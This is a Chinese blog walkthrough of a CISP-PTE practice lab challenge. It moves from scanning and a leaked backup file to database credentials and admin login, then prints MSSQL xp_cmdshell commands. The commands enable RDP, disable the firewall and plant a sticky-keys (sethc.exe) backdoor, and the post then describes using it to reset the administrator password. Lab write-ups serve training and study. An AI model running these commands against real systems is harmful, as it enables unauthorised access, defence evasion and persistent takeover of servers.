cisp-pte靶场通关思路分享----综合题篇
2021/6/11 10:51:27
本文主要是介绍cisp-pte靶场通关思路分享----综合题篇,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
综合题目前只搞到一个靶场,一起来看看吧。。。
打开页面是这个样子的,
第一步:先来扫一下端口,爆破一下目录。
看来80端口是没有什么可搞得,再来看看8080端口。
8080端口是一个后台,还扫出了备份文件。
第二步:有了这个网站备份文件,当然要翻翻看,有没有什么账号密码什么的。
第三步:打开navicat连接,得来全不费工夫。
第四步:得到第一个key,接着再翻翻其他库,找找后台账号密码。
很顺利就找到了,不过需要解密
第五步,有了后台账号密码,登陆看看,没想到,这个key就在页面里。
第六步:登录进来以后,找找有没有上传点什么的。折腾了半天找了一堆无用的漏洞,上传点也上传不上去。这才想起来因为目标服务器系统是Windows 2003,所以可以利用数据库操作命令关闭系统防火墙,写入cmd弹窗木马。
这里把代码贴给大家:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
EXEC master.dbo.xp_cmdshell 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'
EXEC master.dbo.xp_cmdshell 'cd C:\WINDOWS\system'
EXEC master.dbo.xp_cmdshell 'copy cmd.exe c:\WINDOWS\system\sethc.exe' (这一操作不明白的建议看下结尾推荐的博文)
EXEC master.dbo.xp_cmdshell 'netstat -an'
想着建个用户就可以登录3389远程桌面了,但是谁想拒绝访问。
参考网上的解决办法 :
按5下shift 激活粘滞键,然后输入explorer.exe 刷新桌面,免密码选择计算机管理,修改administrator 密码
或者按5下后,输入计算机管理的单词:compmgmt.msc 调出计算机管理,改密码
进入桌面拿到key3
就这样修改密码,远程连接,就拿下最后一个key了。
后来查了下这个功能,才大致了解了。详细的参考下面这个博客。
https://www.cnblogs.com/hai-long/p/12038251.html
这篇关于cisp-pte靶场通关思路分享----综合题篇的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23增量更新怎么做?-icode9专业技术文章分享
- 2024-11-23压缩包加密方案有哪些?-icode9专业技术文章分享
- 2024-11-23用shell怎么写一个开机时自动同步远程仓库的代码?-icode9专业技术文章分享
- 2024-11-23webman可以同步自己的仓库吗?-icode9专业技术文章分享
- 2024-11-23在 Webman 中怎么判断是否有某命令进程正在运行?-icode9专业技术文章分享
- 2024-11-23如何重置new Swiper?-icode9专业技术文章分享
- 2024-11-23oss直传有什么好处?-icode9专业技术文章分享
- 2024-11-23如何将oss直传封装成一个组件在其他页面调用时都可以使用?-icode9专业技术文章分享
- 2024-11-23怎么使用laravel 11在代码里获取路由列表?-icode9专业技术文章分享
- 2024-11-22怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享